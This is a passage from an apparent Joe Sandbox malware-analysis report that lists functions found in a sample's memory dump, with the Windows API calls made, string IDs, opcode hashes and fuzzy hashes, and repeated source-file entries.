                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            • API String ID: 886957087-24824748
                            • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                            • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                            • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                            • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                            Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorMode$LabelVolume
                            • String ID: \VH
                            • API String ID: 2006950084-234962358
                            • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                            • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                            • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                            • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                            Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetMenuItemInfoW.USER32 ref: 00449727
                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                            • DrawMenuBar.USER32 ref: 00449761
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Menu$InfoItem$Draw_malloc
                            • String ID: 0
                            • API String ID: 772068139-4108050209
                            • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                            • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                            • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                            • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                            Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$_wcscpy
                            • String ID: 3, 3, 8, 1
                            • API String ID: 3469035223-357260408
                            • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                            • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                            • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                            • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                            Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpCloseHandle
                            • API String ID: 2574300362-3530519716
                            • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                            • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                            • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                            • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                            Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpCreateFile
                            • API String ID: 2574300362-275556492
                            • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                            • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                            • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                            • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                            Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpSendEcho
                            • API String ID: 2574300362-58917771
                            • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                            • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                            • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                            • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                            Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            • API String ID: 2574300362-4033151799
                            • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                            • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                            • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                            • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                            Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                            • API String ID: 2574300362-1816364905
                            • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                            • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                            • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                            • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                            Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                            • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                            • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                            • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                            Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0047950F
                            • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                            • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                            • VariantClear.OLEAUT32(?), ref: 00479650
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$AllocClearCopyInitString
                            • String ID:
                            • API String ID: 2808897238-0
                            • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                            • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                            • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                            • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                            Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                            • __itow.LIBCMT ref: 004699CD
                              • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                            • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                            • __itow.LIBCMT ref: 00469A97
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$__itow
                            • String ID:
                            • API String ID: 3379773720-0
                            • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                            • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                            • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                            • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                            Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00449A4A
                            • ScreenToClient.USER32(?,?), ref: 00449A80
                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID:
                            • API String ID: 3880355969-0
                            • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                            • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                            • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                            • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                            Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            • API String ID: 2782032738-0
                            • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                            • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                            • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                            • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                            Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                            Download Yara Rule
                            APIs
                            • ClientToScreen.USER32(00000000,?), ref: 0044169A
                            • GetWindowRect.USER32(?,?), ref: 00441722
                            • PtInRect.USER32(?,?,?), ref: 00441734
                            • MessageBeep.USER32(00000000), ref: 004417AD
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID:
                            • API String ID: 1352109105-0
                            • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                            • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                            • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                            • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                            Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                            • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                            • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                            • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                            • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                            Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
